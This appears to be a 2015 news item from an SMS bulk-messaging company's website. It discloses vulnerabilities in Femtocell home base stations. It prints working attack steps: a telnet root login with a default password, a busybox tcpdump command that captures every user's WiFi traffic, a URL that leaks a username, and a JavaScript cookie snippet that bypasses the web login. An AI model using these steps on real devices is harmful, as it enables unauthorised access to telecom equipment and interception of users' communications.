欢迎您来到乐信短信平台!
短信群发咨询热线:400-6699-521
行业动态

Industry trends

当前位置:首页 > 短信动态

家庭基站Femtocell截获任意短信漏洞,危及公众移动通信安全

发布时间 :2015-11-23 来源 :
  移动互联网发展到帐用户对短信、通话、数据流需求剧增,转向互动任意短信需求,而Femtocell设备可以被改造成伪基站短信群发器,截取家庭任意短信隐私,移动短信安全通信漏洞凸显。
  近日,有部分运营商通报Femtocell虽能瞬间解决室内ip网络覆盖问题,但是漏洞问题百出,很多厂家已经对全网设备进行紧急修复,漏洞暂时已经修复完成,但是漏洞问题还会存在吗?
  乐信揭秘Femtocell任意漏洞三大细节:
  ①root弱密码
  可以直接telnet登录,然后就是一个拥有root权限的Linux shell了。
  $ telnet 192.168.197.1
  login: root
  password: 5up
  顺便提一句,这个密码应该是Atheros的参考设计板PB44的默认密码,很多厂商拿来都不改。在搜索引擎上以"5up"和"root"为关键词,可以搜索到不少有趣的东西。
  并且发现上面的busybox基本没有裁剪,甚至连tcpdump功能都有。
  于是,可以直接抓取到所有连上此WiFi的流量:
  busybox tcpdump -i br0 not port 23
  ② 其它利用方式
  /mnt/flash/nvm/femtoOamStore.db 是 Sqlite3 的文件,可以使用sqlitebrowser直接查看
  闪灯 /mnt/flash/led_ctrl.sh [on|off]
  ③ RF 板卡渗透:Web 登录绕过
  访问 http://192.168.197.241/C/userProcessFunction.asp?reqType=4&role=marketUser 获得用户名为
  abmoc@24320
  然后在USER.js里发现原有的登录绕过问题没有得到修复,于是在浏览器中打开Console,输入以下脚本即可登录:
  SetCookie('role', 'marketUser');
  SetCookie('username', 'abmoc@24320');
  SetCookie('levels', [-2, 0, 1, 3, 11, 13, 15, 16]);
  document.cookie = "loginFlag=1;";
  window.top.location = 'main.asp?r=' + Math.random() + '#index';
  登录之后,我们就拥有了与运营商派过来开站的工程师完全一样的操作权限!
扫一扫,加入乐信应用讨论!
  • 乐信新浪企业微博

    乐信新浪企业微博

  • 乐信官方微信二维码

    乐信官方微信

  • [乐信短信平台]版权所有. 友链申请,联系QQ:973964554 .

    Copyright © 2004 - 2025 lexinchina. All Rights Reserved. sitemap | 网站地图          豫公网安备 41010502002232号

    电话咨询:4006699521